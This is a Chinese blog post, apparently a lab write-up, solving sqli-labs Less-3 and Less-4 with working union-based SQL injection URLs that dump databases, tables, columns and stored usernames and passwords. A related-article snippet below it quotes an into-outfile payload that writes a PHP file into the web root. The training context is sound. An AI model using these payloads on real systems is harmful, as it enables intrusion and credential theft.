sqli-labs Less-3~Less-4

最新推荐文章于 2022-06-10 15:10:50 发布
最新推荐文章于 2022-06-10 15:10:50 发布
阅读量160 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47387913/article/details/115465277
版权
本文详细介绍了sqli-labs中Less-3和Less-4两个基于错误的SQL注入漏洞。通过错误信息,作者展示了如何利用单引号和双引号闭合来构造注入语句,从而获取数据库信息,包括爆库、爆表、爆字段和爆数据。这些例子展示了SQL注入的基本步骤和技巧。
摘要由CSDN通过智能技术生成

Less-3 Error based – Single quotes with twist – string(基于错误-带括号的单引号-字符串)

标题已经很明确了,但是测试测试,必须试一试。
?id=1
在这里插入图片描述

?id=1’
在这里插入图片描述

看见报错多的一个括号
?id=1"
在这里插入图片描述

?id=1’)
在这里插入图片描述

报错的时候,查询语句为:
Select login_name,select password from table where id=(‘1’)
这时候就要用到源码来看看了,git bash连接到主机,直接查看源码
在这里插入图片描述

这很对,注入点正确。
那么继续爆数据库
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata --+
在这里插入图片描述

爆表
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘pikachu’ --+
在这里插入图片描述

爆字段
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ and table_schema=‘pikachu’ --+
在这里插入图片描述

爆数据
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,group_concat(username),group_concat(password) from users --+
在这里插入图片描述

还有多说一种,爆当前(也就是sqli-labs)的数据库的信息
http://192.168.229.144/sqli-labs/Less-3/?id=-1’) union select 1,2,concat_ws(’-’,user(),version(),database()) --+
在这里插入图片描述

Less-4 Error based – Double Quotes – String (基于错误-双引号-字符串)

同样,还是尝试将?id=1 ?id=1’ ?id=1" 分别添加到url,发现?id=1"报错,说明是字符型注入
在这里插入图片描述

还是查看源码
在这里插入图片描述

id = ‘"’.$id.’"’;
sql=“SELECT * FROM users WHERE id=(id) LIMIT 0,1”;
这样形成的语句就是:select * from users where id=(“id”) limit 0,1"
那么?id=1"),这样即闭合了前面,又闭合了后面
在这里插入图片描述

注入成功,猜字段数,爆数据库,爆表名,爆字段,爆数据与Less-3相同,只需要将?id=1’)变为?id=1")注入。

小总结:
从Less-1到Less-4都是基于错误的sql注入,切入点都是闭合问题,且都是通过回显进行注入。
Less-1: $sql="SELECT * FROM users WHERE id=‘id’ LIMIT 0,1”;
Less-2: $sql=“SELECT * FROM users WHERE id=id LIMIT 0,1”;
Less-3: $sql=“SELECT * FROM users WHERE id=(‘id’) LIMIT 0,1”;
Less-4: $id = '”’ . $id . '”’;sql=“SELECT * FROM users WHERE id=(id) LIMIT 0,1”;

2YH
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 779
初学sql注入SQLi-LABS过关分享Less-3
Sqli-labs Less-3 题解
Zhuoqian_1的博客
03-12 326
这道题感觉还是挺简单的,废话少说,直接开始。 原页面: 1、尝试?id=1 2、尝试单引号注入 ?id=1' 报错了 分析语句为 '' 1' ') LIMIT 0,1' 语句中多了一个') ,猜测是select ... from ... where (id='$id')这种的。 3、构造 where (id='1') and 1=1 #') LIMIT 0,1 这里开始构造了个or 1=1 导致后面union注入时,语句始终为真,找了好久。。。 4、构造 where...
sql注入系列之Sqli-labs(less-3)
BetsyMyGirl的博客
12-02 4319
看完还不会Sql注入你来打我
sqli-labs less-3
阿刁〇的博客
03-29 245
文章目录sqli-labs less-3* 判断是否存在注入* 判断列数* 报显示位* 查询详细信息* 查询当前数据库和版本* 查询数据库下的表* 查询表下的列* 输出最终查询到的信息 sqli-labs less-3 * 判断是否存在注入 输入?id=1 回显正常 输入?id=1' 回显错误 输入?id=1" 回显正常 但根据回显信息,此题是由’)来进行闭合的,所以尝试输入’)进行闭合 输入?id=1') and 1=1 --+ 回显正常 输入?id=1') and 1=2 --+ 回显错误
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
最新发布
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 3: sqli-labs 下载和配置 下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 ...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
sqli-labs靶场Less-3
songling515010475的专栏
08-20 374
1、访问首页,index.php?id=1,这里的传参点是id 2、判断注入点是数字还是字符,如果是字符就需要闭合 and 1=1-- qwe and 1=2-- qwe 分析:通过以上探测发现并不起效果,考虑是不是和第一关一样需要单引号闭合,再次尝试 ' and 1=1-- qwe 分析:通过单引号闭合发现报错了,难道是双引号闭合?再次尝试 分析:尴尬了,单双引号都不行?对于初学者的我,一下子脑子短路了,于是翻了一下源代码,一下突然惊醒,还有括号没试,还是不细心呀..
在线sqli-labs 通关大全 Less-3
qq_44985415的博客
08-31 448
sqli-labs (2) 励志语录 学习知识要善于思考,思考,再思考。——爱因斯坦 1.知识点 (1)字符型:’) (2)sqlmap使用 2.题解 注:因题目简单所以下解题步骤大多以图片显示不再做过多解释 方法一:手工注入 图一 图二 注意看图二图三有什么不同,图二是第三关的,而图三是第一关的解题步骤,本关sql注入在单引号的条件下又多了一个右括号,因此想绕过需要把右括号也加上 图三 右括号加上之后在进行实验发现返回结果正常 图四 猜字段 图五 用下面这条语句爆库名,将id=1换成了id=-1,因
网络安全-sqlmap实战之sqlilabs-Less3
关注网络安全、云原生安全
06-26 2050
类型 字符串转换错误,他又提示输入数字型ID,应该是把数字转换为了字符串 注入判断 截图 结合课程1,猜测sql语句为 select * from users where id = ('参数') LIMIT 0,1 -dbs枚举数据库 python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs 4种注入方式 枚举数据库 -tables枚举表 python sqlmap.py -u "192...
Sqli-Labs之less-3
ISNS的博客
02-05 1103
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
sqli-labs练习之 Less-3
博客地址 www.sec0nd.top
06-13 446
文章目录判断是否存在注入注入方法order by 查列union select回显利用联合查询查库查表查列查字段 为了方便了解注入的语句,与上两关一样,在第三关的代码中添加 echo $sql;//输出构造的sql语句 echo "<br>";//换行符 判断是否存在注入 /?id=1 发现id是用括号和引号包裹着的 (‘1’) 注入方法 /?id=1') --+ 剩下的与less1,less2操作一致 order by 查列 ?id=1') order by 4 --+ union
sqli-labs (less-3)
kukudeshuo的博客
03-07 177
sqli-labs (less-3) 输入 http://127.0.0.1/sql1/Less-3/?id=1 http://127.0.0.1/sql1/Less-3/?id=1' http://127.0.0.1/sql1/Less-3/?id=1')--+ 根据输入1’的错误信息判断为字符型注入 查库 http://127.0.0.1/sql1/Less-3/?id=-1') union select 1,2,database()--+ 查表 http://127.0.0.1/sql1/L
从零记录sqli-labs学习过程 sqli-labs Less-3
fpxnb1的博客
03-24 2123
sqli-labs Less-3
最详细SQLi-LABS靶场 less-3教学
小明师傅博客
05-31 481
来到第三关 继续老规矩 and 1=1,and 1=2 没反应 那我们继续来用单引号来试 ’ 报错了 细心的会发现相比第一关 多出了一个 ) 我们就可以猜测后台语句可能是 select * from * where id = (’$id’) LIMIT 0,1 我们就可以构造语句了 把(‘1’) 构造成 (‘1’) sql语句 #’) 例如: ?id=1') order by 3 %23 代入进去成功通关 ...
sqli-labs less
07-28
- *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值